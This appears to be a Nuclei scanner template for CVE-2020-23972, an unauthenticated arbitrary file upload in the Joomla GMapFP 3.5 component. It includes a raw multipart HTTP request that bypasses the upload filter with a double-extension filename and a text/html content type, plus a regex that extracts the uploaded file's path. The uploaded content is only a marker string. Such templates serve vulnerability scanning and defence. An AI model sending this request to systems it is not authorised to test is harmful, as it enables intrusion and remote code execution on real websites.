72 lines
2.8 KiB
YAML
72 lines
2.8 KiB
YAML
id: CVE-2020-23972
|
|
|
|
info:
|
|
name: Joomla! Component GMapFP 3.5 - Arbitrary File Upload
|
|
author: dwisiswant0
|
|
severity: high
|
|
description: |
|
|
Joomla! Component GMapFP 3.5 is vulnerable to arbitrary file upload vulnerabilities. An attacker can access the upload function of the application
|
|
without authentication and can upload files because of unrestricted file upload which can be bypassed by changing Content-Type & name file too double ext.
|
|
impact: |
|
|
Successful exploitation of this vulnerability can result in unauthorized remote code execution on the affected Joomla! website.
|
|
remediation: |
|
|
Apply the latest security patch or update to a patched version of Joomla! Component GMapFP 3.5 to mitigate this vulnerability.
|
|
reference:
|
|
- https://www.exploit-db.com/exploits/49129
|
|
- https://raw.githubusercontent.com/me4yoursecurity/Reports/master/README.md
|
|
- http://packetstormsecurity.com/files/159072/Joomla-GMapFP-J3.5-J3.5F-Arbitrary-File-Upload.html
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2020-23972
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
|
|
cvss-score: 7.5
|
|
cve-id: CVE-2020-23972
|
|
cwe-id: CWE-434
|
|
epss-score: 0.5953
|
|
epss-percentile: 0.97461
|
|
cpe: cpe:2.3:a:gmapfp:gmapfp:j3.5:*:*:*:-:joomla\!:*:*
|
|
metadata:
|
|
max-request: 2
|
|
vendor: gmapfp
|
|
product: gmapfp
|
|
framework: joomla\!
|
|
tags: cve,cve2020,joomla,edb,packetstorm,fileupload,intrusive,gmapfp,joomla\!
|
|
variables:
|
|
name: "{{to_lower(rand_text_alpha(5))}}"
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
POST /index.php?option={{component}}&controller=editlieux&tmpl=component&task=upload_image HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarySHHbUsfCoxlX1bpS
|
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
|
|
Referer: {{BaseURL}}
|
|
Connection: close
|
|
|
|
------WebKitFormBoundarySHHbUsfCoxlX1bpS
|
|
Content-Disposition: form-data; name="option"
|
|
|
|
com_gmapfp
|
|
------WebKitFormBoundarySHHbUsfCoxlX1bpS
|
|
Content-Disposition: form-data; name="image1"; filename="{{name}}.html.gif"
|
|
Content-Type: text/html
|
|
|
|
projectdiscovery
|
|
|
|
------WebKitFormBoundarySHHbUsfCoxlX1bpS
|
|
Content-Disposition: form-data; name="no_html"
|
|
|
|
no_html
|
|
------WebKitFormBoundarySHHbUsfCoxlX1bpS--
|
|
|
|
payloads:
|
|
component:
|
|
- "com_gmapfp"
|
|
- "comgmapfp"
|
|
|
|
extractors:
|
|
- type: regex
|
|
regex:
|
|
- "window\\.opener\\.(changeDisplayImage|addphoto)\\(\"(.*?)\"\\);"
|
|
part: body
|
|
# digest: 4b0a00483046022100bfc9ec1fc45421663f7f2742fe053dce48eef1bd72879aa56eb96a7b0a413ae5022100e9cfd08b3051fe6fe8962d99e16c0a9469b56419ae7e28aac2c8c20c0cb8605f:922c64590222798bb761d5b6d8e72950 |